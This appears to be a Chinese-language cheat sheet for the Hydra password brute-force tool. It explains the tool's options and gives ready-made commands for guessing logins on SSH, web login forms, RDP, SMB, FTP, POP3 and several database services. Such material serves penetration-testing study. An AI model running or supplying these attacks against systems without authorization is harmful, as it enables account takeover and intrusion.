Hydra
Hydra也叫九头蛇,是一款开源的暴力PJ工具,集成在kali当中。
参数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66
| -l 指定用户名 -p 指定密码 -L 指定用户名字典 -P 指定密码字典 -C 指定所用格式为“user:password”的字典文件 -e n null,表示尝试空密码 s same,把用户名本身当做密码进行尝试 r 反向,把用户名倒叙,当做密码进行尝试。 -vV 显示执行细节 -o 保存执行结果 -s 指定非默认端口 -M 指定破解的目标文件,如果不是默认端口,后面跟上“:port” -t 指定爆破时的任务数量(默认16)线程数 -f 破解出密码就停止爆破
----------------------------------- 爆破ssh协议 hydra -l root -p 12345678 192.168.31.173 ssh -vV
使用字典爆破 hydra -l root -P 密码字典 192.168.31.173 ssh
SSH协议的默认用户是 root,所以上面我们都是指定的用户名,如果不确定用户名,就要指定用户名字典,比如下面这种格式: hydra -L usr.txt -P pwd.txt 192.168.31.173 ssh
get方式提交,破解web登录: hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php
post方式提交,破解web登录: hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username\=USER&password\=PASS&submit\=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id\=USER&passwd\=PASS:\<title\>wrong username or password\</title\>"
破解https: hydra -m /index.php -l muts -P pass.txt IP https hydra -m /index.php -l username -P pass.txt IP https ---------------------------------- Hydra爆破常见服务 远程桌面(RDP) hydra -l administrator -P 密码字典 192.168.31.173 rdp
共享文件(SMB) hydra -l administrator -P 密码字典 192.168.31.173 smb
文件传输(FTP) hydra -l 用户名 -P 密码字典 192.168.31.173 ftp
邮箱协议(POP3) hydra -l 用户名 -P 密码字典 192.168.31.173 pop3
MSSQL数据库 hydra -l sa -P 密码字典 192.168.31.173 mssql
MySQL数据库 hydra -l 用户名 -P 密码字典 192.168.31.173 mysql
Oracle数据库 hydra -l 用户名 -P 密码字典 192.168.31.173 oracle
Redis数据库 hydra -l 用户名 -P 密码字典 192.168.31.173 redis
PgSQL数据库 hydra -l 用户名 -P 密码字典 192.168.31.173 postgresql
|